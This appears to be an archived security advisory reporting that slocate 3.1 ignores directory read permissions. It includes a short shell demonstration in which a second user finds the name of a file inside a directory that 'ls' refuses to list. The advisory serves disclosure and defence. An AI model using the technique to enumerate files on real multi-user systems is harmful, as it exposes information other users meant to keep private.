TUCoPS :: HP Unsorted S :: c07-1795.htm

slocate leaks filenames of protected directories
slocate leaks filenames of protected directories
slocate leaks filenames of protected directories



* Version tested: 3.1

* Problem description: slocate doesn't check readability bit of containing directory. It can divulge the existence of files in a directory that is unreadable (e.g. by the 'ls' command) by a user.

* Demonstration:

As user1:

$ cd /tmp
$ mkdir dir
$ chmod 711 dir
$ cd dir
$ touch "a-secret-file"
$ cd ..

$ updatedb -o db -U dir

As user2:

$ cd /tmp
$ ls dir
ls: .: Permission denied

But:

$ slocate -d db file
dir/a-secret-file

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH